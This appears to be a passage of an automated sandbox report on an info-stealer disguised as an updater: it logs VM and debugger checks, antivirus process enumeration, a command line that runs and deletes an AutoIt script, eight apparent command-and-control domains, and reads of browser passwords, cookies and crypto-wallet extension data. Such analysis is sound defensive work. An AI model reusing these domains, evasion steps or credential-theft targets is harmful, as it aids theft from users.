          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeAPI coverage: 5.3 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7628Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B8E180
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B9A187
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B9A2E4
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,35_2_00B9A66E
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose,35_2_00B9686D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose,35_2_00B8E9BA
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B974F0 FindFirstFileW,FindClose,35_2_00B974F0
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,35_2_00B97591
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B8DE32
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,35_2_013F50B5
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F51BD FindFirstFileA,GetLastError,35_2_013F51BD
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,35_2_013F29E5
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_00B3310D
          Source: Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
          Source: Updater.exe, Updater.exe, 00000023.00000003.2221324344.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227714652.0000000001389000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2221324344.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
          Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
          Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01403EA7 LdrInitializeThunk,35_2_01403EA7
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9F607 BlockInput,35_2_00B9F607
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,35_2_00B32D33
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_00B3310D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B44BF4 mov eax, dword ptr fs:[00000030h]35_2_00B44BF4
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01415AFE mov eax, dword ptr fs:[00000030h]35_2_01415AFE
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h]35_2_01409B8A
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h]35_2_01409B8A
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h]35_2_01409B91
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h]35_2_01409B91
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01403CA5 mov eax, dword ptr fs:[00000030h]35_2_01403CA5
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B820BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,35_2_00B820BE
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B52446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00B52446
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B40E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00B40E4D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B40F9F SetUnhandledExceptionFilter,35_2_00B40F9F
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B411EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00B411EE
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeMemory protected: page readonly | page read and write | page guard | page no cacheJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: servicedny.site
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: authorisev.site
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: faulteyotk.site
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: dilemmadu.site
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: contemteny.site
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: goalyfeastz.site
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: opposezmny.site
          Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: seallysl.site
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,35_2_00B8230F
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,35_2_00B32D33
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8C078 SendInput,keybd_event,35_2_00B8C078
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00BA2E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,35_2_00BA2E89
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENTJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3xJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3xJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B81C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,35_2_00B81C68
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B82777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,35_2_00B82777
          Source: Updater.exe, 0000001C.00000000.1715428534.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: Updater.exeBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B40CA4 cpuid 35_2_00B40CA4
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,35_2_013F2BBD
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: GetLocaleInfoA,GetACP,35_2_013F90D9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: GetLocaleInfoA,35_2_013F34E1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: GetLocaleInfoA,35_2_013F7B41
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: GetLocaleInfoA,35_2_013F7B8D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,35_2_013F2CC7
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B98C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,35_2_00B98C58
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B659C7 GetUserNameW,35_2_00B659C7
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B5B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,35_2_00B5B99F
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_00B3310D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: find.exe, 00000013.00000002.1709477597.0000021154610000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1709402244.000002115444B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
